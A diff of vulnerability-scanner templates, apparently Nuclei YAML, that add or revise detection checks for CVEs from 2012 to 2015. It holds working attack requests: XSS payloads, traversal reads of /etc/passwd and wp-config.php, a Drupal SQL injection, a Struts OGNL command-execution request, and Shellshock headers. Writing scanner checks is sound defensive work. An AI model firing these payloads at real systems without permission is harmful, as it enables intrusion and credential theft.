description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
reference: |
- https://www.securityfocus.com/bid/52841/info
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
tags: cve,cve2012,xss,manageengine
requests:
- method: GET
path:
- "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2012-5913
info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -4,7 +4,8 @@ info:
name: Apache Struts2 S2-012 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965
description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
reference: http://struts.apache.org/development/2.x/docs/s2-012.html
tags: cve,cve2013,apache,rce,struts
requests:
@ -21,7 +22,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:

View File

@ -0,0 +1,20 @@
id: CVE-2013-2248
info:
name: Apache Struts - Multiple Open Redirection Vulnerabilities
author: 0x_Akoko
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/38666
severity: low
tags: cve,cve2013,apache,redirect,struts
requests:
- method: GET
path:
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

View File

@ -2,9 +2,10 @@ id: CVE-2013-2251
info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
author: exploitation & @dwisiswant0
author: exploitation,dwisiswant0,alex
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
tags: cve,cve2013,rce,struts,apache
requests:
@ -28,6 +29,13 @@ requests:
Accept: */*
Accept-Language: en
- |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
matchers-condition: and
matchers:
- type: status
@ -38,10 +46,4 @@ requests:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- type: word
words:
- "There is no Action mapped for namespace"
- "The origin server did not find a current representation for the target resource"
- "Apache Tomcat"
condition: or
part: body

View File

@ -0,0 +1,29 @@
id: CVE-2013-2287
info:
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,29 @@
id: CVE-2013-3526
info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,38 @@
id: CVE-2013-3827
info:
name: Javafaces LFI
author: Random-Robbie
severity: medium
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
requests:
- method: GET
path:
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
matchers-condition: and
matchers:
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2013-4117
info:
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: CVE-2013-5528
info:
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
reference: https://www.exploit-db.com/exploits/40887
tags: cve,cve2013,lfi,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: CVE-2013-7240
info:
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference: |
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,29 @@
id: CVE-2014-2321
info:
name: ZTE Cable Modem Web Shell
description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
author: geeknik
reference:
- https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/
- https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
severity: high
tags: iot,cve,cve2014,zte
requests:
- method: GET
path:
- "{{BaseURL}}/web_shell_cmd.gch"
matchers-condition: and
matchers:
- type: word
words:
- "please input shell command"
- "ZTE Corporation. All rights reserved"
part: body
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,21 @@
id: CVE-2014-2323
info:
name: Lighttpd 1.4.34 SQL injection and path traversal
description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
author: geeknik
severity: critical
tags: cve,cve2014,sqli,lighttpd
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host: [::1]' UNION SELECT '/
unsafe: true
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"

View File

@ -0,0 +1,32 @@
id: arbitrary-file-read-in-dompdf
info:
name: Arbitrary file read in dompdf < v0.6.0
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/33004
tags: dompdf,lfi
# - "/dompdf.php?input_file=C:/windows/win.ini"
# - "/dompdf.php?input_file=/etc/passwd"
requests:
- method: GET
path:
- "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
matchers-condition: and
matchers:
- type: word
words:
- "application/pdf"
- 'filename="dompdf_out.pdf"'
part: header
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: CVE-2014-2962
info:
name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal
author: daffainfo
severity: high
description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
reference: https://www.exploit-db.com/exploits/38488
tags: cve,cve2014,lfi,router
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -4,7 +4,11 @@ info:
name: ElasticSearch v1.1.1/1.2 RCE
author: pikpikcu
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
description: |
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
reference: |
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
- https://www.elastic.co/blog/logstash-1-4-3-released
tags: cve,cve2014,elastic,rce
requests:
@ -45,7 +49,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
part: body
- type: status

View File

@ -0,0 +1,32 @@
id: CVE-2014-3704
info:
name: Drupal Sql Injetion
author: princechaddha
severity: high
description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
reference: |
- https://www.drupal.org/SA-CORE-2014-005
- http://www.exploit-db.com/exploits/34984
- http://www.exploit-db.com/exploits/34992
- http://www.exploit-db.com/exploits/34993
- http://www.exploit-db.com/exploits/35150
tags: cve,cve2014,drupal,sqli
requests:
- method: POST
path:
- "{{BaseURL}}/?q=node&destination=node"
body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a'
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
words:
- "PDOException"
- "e807f1fcf82d132f9bb018ca6738a19f"
condition: and
part: body

View File

@ -0,0 +1,25 @@
id: CVE-2014-3744
info:
name: Node.js st module Directory Traversal
author: geeknik
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
reference: |
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
- https://snyk.io/vuln/npm:st:20140206
severity: high
tags: cve,cve2014,lfi,nodejs,st
requests:
- method: GET
path:
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -0,0 +1,29 @@
id: CVE-2014-4210
info:
name: Weblogic SSRF in SearchPublicRegistries.jsp
author: princechaddha
severity: medium
tags: cve,cve2014,weblogic,oracle,ssrf
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
requests:
- method: GET
path:
- "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Connection refused"
- "Socket Closed"
- "content-type: unknown/unknown"
part: body
condition: or

View File

@ -0,0 +1,30 @@
id: CVE-2014-4513
info:
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513
tags: cve,cve2014,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
matchers-condition: and
matchers:
- type: word
words:
- "</textarea></script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,29 @@
id: CVE-2014-5368
info:
name: WordPress Plugin WP Content Source Control - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference: |
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

View File

@ -5,6 +5,9 @@ info:
author: pentest_swissky
severity: high
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
reference: |
- http://www.kb.cert.org/vuls/id/252743
- http://www.us-cert.gov/ncas/alerts/TA14-268A
tags: cve,cve2014,rce
requests:
@ -17,6 +20,7 @@ requests:
- "{{BaseURL}}/cgi-bin/status/status.cgi"
- "{{BaseURL}}/test.cgi"
- "{{BaseURL}}/debug.cgi"
- "{{BaseURL}}/cgi-bin/test-cgi"
headers:
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
@ -28,5 +32,5 @@ requests:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
- "root:.*:0:0:"
part: body

View File

@ -0,0 +1,24 @@
id: CVE-2014-6308
info:
name: Osclass Security Advisory 3.4.1 - Local File Inclusion
author: daffainfo
severity: high
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: CVE-2014-8799
info:
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference: |
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_USER"
- "DB_HOST"
part: body
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,29 @@
id: CVE-2014-9094
info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,2014,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: CVE-2015-1000012
info:
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
reference: |
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
- type: status
status:
- 200

View File

@ -4,7 +4,10 @@ info:
name: ElasticSearch 1.4.0/1.4.2 RCE
author: pikpikcu
severity: critical
reference: https://blog.csdn.net/JiangBuLiu/article/details/94457980
description: The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
reference: |
- https://blog.csdn.net/JiangBuLiu/article/details/94457980
- http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/
tags: cve,cve2015,elastic,rce
requests:
@ -43,7 +46,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
- "root:.*:0:0:"
part: body
- type: status

View File

@ -0,0 +1,33 @@
id: CVE-2015-1880
info:
name: XSS in Fortigates SSL VPN login page
author: pikpikcu
severity: medium
description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2015-1880
- https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
tags: cve,cve2015,xss,fortigates,ssl
requests:
- method: GET
path:
- "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('{{randstr}}')</script>"
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header

View File

@ -4,14 +4,18 @@ info:
name: Eclipse Jetty Remote Leakage
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080
reference: |
- https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
description: |
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
tags: cve,cve2015,jetty
requests:
- method: POST
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
headers:
Referer: \x00

View File

@ -0,0 +1,31 @@
id: CVE-2015-2807
info:
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff Show More